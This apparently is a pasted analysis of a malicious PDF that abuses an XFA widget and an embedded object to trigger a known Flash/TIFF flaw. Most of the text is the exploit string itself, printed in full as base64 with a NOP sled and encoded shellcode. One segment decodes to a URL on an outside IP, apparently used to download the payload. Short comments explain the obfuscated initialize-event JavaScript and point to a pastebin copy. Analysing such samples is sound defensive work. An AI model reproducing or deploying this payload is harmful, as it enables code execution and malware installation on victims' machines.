g6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol
  94.  
  95. // to be clearer view:
  96.  
  97. SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  98. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  99. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  100. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  101. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  102. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  103. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  104. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  105. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  106. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  107. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  108. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  109. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  110. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  111. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  112. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  113. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  114. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  115. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  116. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  117. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  118. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  119. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ6xe5HAMAAIs0JIn3VoA+XnQGrDS8quL6w+jk////4jHKqFTmvby8Bci/vL
  120. w1e08YQ1wxDLS/vLxU+L28vCsxI7y5vLzWtuHxszgsvLy86utU1728vNQ8vry87+tUhL28vDl8yL5XXNTdPWVzVA6+
  121. vLxDbIC6wKRUz728vIG8nLy8wbDvVBG8vLw5fMmiVwTvVNi8vLw5fMmujXzYN/ykN/yIgVi+vLzIZlcg6zVL1kPljX
  122. xAThIr4zyEvMi/Klc464181kPlQE7aE3v7Qoe8jbzj1Dy+vLzv61QHvLy81E5nyBFUO728vNQk0/OB7FQKvby81rzW
  123. QkNs6TVZ1ujllXDcMcCYnOuNfE8W4zHLrNb4M7qNZ9Q0Qg+qVLi+vLzr6u/v7+/v7+9DybRDbDX4mKDddX64vOk1Wd
  124. aA5ZVw6zHAmLjt6418TxbjM7vWz9TSvN281M68ybw127BDybQz+6zURsYpWFS4vby81GFkkkDsVI+9vLzrQ2w/eLDj
  125. dX64vNTodhMtVCS9vLzW/NS8rLy81r3WvENsf+k1WVTkvby81NlT87nsVEG8vLyNde3tQ8msQ8mwQ8m07UNsdX6wvO
  126. k1WdROZ8gRVB68vLzUwvY/a+xUbby8vNa81Jm877wxsJhDybDtQ8m0Q2x1frS86TVZPVC0vry83I1n1MtXt51U1ry8
  127. vCrUsxui5epUJLy8vDHxQO3WtNZDQ2wtX/bU5tJnZ+pUPLy8vDHxRDEBREFDQ+3UvL68vOvWpUPJQENsLV+Z1HEwy0
  128. 3qVOe8vLxDi0Nsswq09dSOwrqc6lT0vLy87UOLQ2w3pDXgmKDddX/cjXzYN+yMN+6wN+6oN86UjUONfBD6OXzIsYDd
  129. wL6QnH1zsb17V1eHwJiYN/6sN67JZzX4mKDdfri83DfQmJg3+YA36LnEvVY39qQ35py9V1+I9TeIN71SjUONfEAQOH
  130. zIu31zsb17V0iHwJiUyV035pi9V9o3sPc35qC9Vze4N71UNfiYoN1+tLzU09K8vNTJztDR6FS/vLy85eV/1DLyslDU
  131. q3aX0lToQ0ND7FQ0Q0NDQ1zUq3aX0lT+Q0NDQ8iYuOxUzkNDQ364vGh0dHA6Ly83OC4xMTAuNjAuOTkvL29sZWdkZW
  132. 15LnBocD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  133. AAAAAAAAAAAAAAAAAAAAkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  134. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  135. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  136. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  137. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  138. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  139. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  140. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  141. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  142. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  143. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  144. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  145. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  146. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  147. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  148. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  149. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  150. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  151. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  152. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  153. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  154. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  155. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  156. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  157. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  158. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  159. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  160. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  161. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  162. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  163. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  164. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  165. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  166. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  167. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  168. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  169. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  170. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  171. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  172. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  173. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  174. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  175. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  176. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  177. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  178. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  179. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  180. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  181. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  182. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  183. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  184. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  185. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  186. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  187. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  188. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  189. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  190. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  191. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  192. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  193. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  194. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  195. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  196. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  197. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  198. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  199. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  200. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  201. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  202. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  203. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  204. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  205. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  206. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  207. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  208. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  209. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  210. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  211. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  212. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  213. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  214. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  215. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  216. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  217. kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
  218. CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
  219. kJCQkJCQkJCQkJCQkAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAA
  220. EAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////kB+ASjiQhEp9foBK/////wAAAABAAAAA
  221. AAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgE
  222. pqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKL
  223. RTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSS
  224. oAde2WMcm1A/Ol
  225. // ↑this strings is to be fed to an object
  226. // At this↓ (esrmhkwko)initial name (a Widget):
  227.  
  228. <</TU (esrmhkwko) /Subtype/Widget /Ff 65536 /T (esrmhkwko[0]) /Parent 1 0 R /P 9 0 R
  229.   ^^^^^^^^^^^^^^^^                           ^^^^^^^^^^^^^^^^^
  230. /Rect [21 22 186 69] /DA (/CourierStd 10 Tf 0 g) /Type/Annot /MK <</TP 1>> /F 4 /FT/Btn>>
  231.  
  232. // and At this event...in the embedded object's script:
  233.  
  234. <subform w="576pt" h="756pt" name="yrjlbwacv"><field h="65mm" name="esrmhkwko" w="85mm"....>
  235.                                                               ^^^^^^^^^^^^^^^^^^
  236. <event name="etnvwbihl" activity="initialize">
  237. <script contentType="application/x-javascript">
  238.    :
  239.    :
  240. =================================
  241. THE REPORT OF ALL THIS
  242. ================================
  243.  
  244. //It wasn't a new 0day concept. It was a known flaw of PDF/Widget feed with malform object to be //run by flash player. story is like this:
  245.  
  246. // In the PDf was attached the embedded object :
  247. <</Length 4075 /Filter/FlateDecode /Type/EmbeddedFile>>
  248. stream
  249. x懦拏oロリヌ゚・.コqコ・Q"i'・・」瀨`ロスシナv(峺D)"薔樫rァ蟇9Zル゙l燥 G8gホ愡イレクL勇6マ猪サル・i>ꏳ・・}・A・・メ8M剩゚;マOメaZdァユ・_~邪キ~ンマwxGミ・:晝zux晙ィ・・゚;+ヒナ+゚マ鞠イFユヘg~・゚喋゙シ
  250.  
  251. //And it has the widget object in this: (variable is changed in every sample)
  252. <</TU (esrmhkwko) /Subtype/Widget /Ff 65536 /T (esrmhkwko[0]) /Parent 1 0 R /P 9 0 R /Rect [21 22 186 69] /DA (/CourierStd 10 Tf 0 g) /Type/Annot /MK <</TP 1>> /F 4 /FT/Btn>>
  253.  
  254. //The embedded object decoded to be have javascript:
  255. <?xml version="1.0" encoding="UTF-8"?><?xfa generator="AdobeDesigner_V7.0" APIVersion="2.2.4333.0"?><xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><config xmlns="http://www.xfa.org/schema/xci/1.0/"><present><pdf><version>1.65</version><interactive>1</interactive><linearized>1</linearized></pdf><xdp><packets>*</packets></xdp><destination>pdf</destination></present></config><template xmlns="http://www.xfa.org/schema/xfa-template/2.5/"><subform layout="tb" locale="en_US" name="tkbsrqyin"><pageSet><pageArea id="ydnjfsoqp" name="ydnjfsoqp"><contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/><medium long="792pt" short="612pt" stock="default"/></pageArea></pageSet><subform w="576pt" h="756pt" name="yrjlbwacv"><field h="65mm" name="esrmhkwko" w="85mm" x="53mm" y="88mm">
  256. <event name="etnvwbihl" activity="initialize"><script contentType="application/x-javascript">
  257. vgbnjqjrs="affsdfsa";
  258.    :
  259.   :
  260. // the event initialized, (long story of double obfuscation, first one is like some
  261. // pasted wepawet report, second one is in above code pasted here
  262. // the naughty exploit string was created, here: http://pastebin.com/raw.php?i=xswdDqhd
  263.  
  264. // The script is feeding back that string into PDF Widget part
  265. // See variable w/ver >= 8.x see decoded code:
  266.     //esrmhkwko.rawValue = gjoegkdqt  // script this lousy part.. it just called the
  267.                                       //var form in PDF for feeding output values..
  268.     document.write(gjoegkdqt);   // <--- change to this to burp value resulted...
  269.  
  270. // and compare to
  271.  
  272. <</TU (esrmhkwko) /Subtype/Widget /Ff 65536 /T (esrmhkwko[0]) /Parent 1 0 R /P 9 0 R /Rect [21 22 186 69] /DA (/CourierStd 10 Tf 0 g) /Type/Annot /MK <</TP 1>> /F 4 /FT/Btn>>
  273.  
  274. // This means feeding it as object to a widget,
  275. // PDF will treat widget mostly as image or movie in SWF engine/Flash Player.
  276. // Malform character will exploit the flaw to gain the code w/API url to get the payload.
  277.  
  278. // The malform parts are:
  279.  
  280. SUkqADggAA
  281.   :
  282. 6xe5HAMAAIs0JIn3VoA+XnQGrDS8quL6w+jk////4jHKqFTmvby8Bci/vLw1e08YQ1wxDLS/vLxU+L28vCsxI7y5vLzWtuHxszgsvLy86utU1728vNQ8vry87+tUhL28vDl8yL5XXNTdPWVzVA6+vLxDbIC6wKRUz728vIG8nLy8wbDvVBG8vLw5fMmiVwTvVNi8vLw5fMmujXzYN/ykN/yIgVi+vLzIZlcg6zVL1kPljXxAThIr4zyEvMi/Klc464181kPlQE7aE3v7Qoe8jbzj1Dy+vLzv61QHvLy81E5nyBFUO728vNQk0/OB7FQKvby81rzWQkNs6TVZ1ujllXDcMcCYnOuNfE8W4zHLrNb4M7qNZ9Q0Qg+qVLi+vLzr6u/v7+/v7+9DybRDbDX4mKDddX64vOk1WdaA5ZVw6zHAmLjt6418TxbjM7vWz9TSvN281M68ybw127BDybQz+6zURsYpWFS4vby81GFkkkDsVI+9vLzrQ2w/eLDjdX64vNTodhMtVCS9vLzW/NS8rLy81r3WvENsf+k1WVTkvby81NlT87nsVEG8vLyNde3tQ8msQ8mwQ8m07UNsdX6wvOk1WdROZ8gRVB68vLzUwvY/a+xUbby8vNa81Jm877wxsJhDybDtQ8m0Q2x1frS86TVZPVC0vry83I1n1MtXt51U1ry8vCrUsxui5epUJLy8vDHxQO3WtNZDQ2wtX/bU5tJnZ+pUPLy8vDHxRDEBREFDQ+3UvL68vOvWpUPJQENsLV+Z1HEwy03qVOe8vLxDi0Nsswq09dSOwrqc6lT0vLy87UOLQ2w3pDXgmKDddX/cjXzYN+yMN+6wN+6oN86UjUONfBD6OXzIsYDdwL6QnH1zsb17V1eHwJiYN/6sN67JZzX4mKDdfri83DfQmJg3+YA36LnEvVY39qQ35py9V1+I9TeIN71SjUONfEAQOHzIu31zsb17V0iHwJiUyV035pi9V9o3sPc35qC9Vze4N71UNfiYoN1+tL